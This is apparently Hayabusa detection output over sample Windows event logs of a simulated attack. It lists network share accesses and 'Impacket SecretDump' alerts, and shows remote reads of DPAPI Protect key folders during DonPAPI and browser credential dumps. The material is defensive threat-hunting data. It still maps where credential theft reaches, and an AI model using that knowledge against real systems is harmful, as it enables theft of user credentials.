0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.897 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.928 
+09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\XwYybEmH.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP 
Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\ZuExrArX.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 20:53:07.706 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | Path: Users | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:08.857 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\oyCCGQai.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:08.857 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.310 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\AqdQWnLE.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.310 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.617 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.617 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.617 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\1d0d5e15-3dd4-4689-a6c8-b3f4a523f317 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.632 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\4940c1c2-798b-4291-9cbf-56ba1bc56acd | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.648 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\dd10a8dd-2e01-4512-9e4e-0ab8b174b115 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.680 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.685 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.685 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234\eca8ffbf-fcd6-4e81-a424-36116606541f | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\084aa96d-4fd0-4004-802f-dad10353ce8b | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.732 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\0f51cf18-7e42-4905-a5e2-4dcd2016ba02 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.748 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\48f8844f-6a0e-44cc-b4c9-4b6aeb83bdcd | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\5dd255ba-fb23-45a9-8f1c-3efe30e43a08 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.763 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\7ac45d37-fa59-41b4-a80a-cb9224e97518 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.779 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 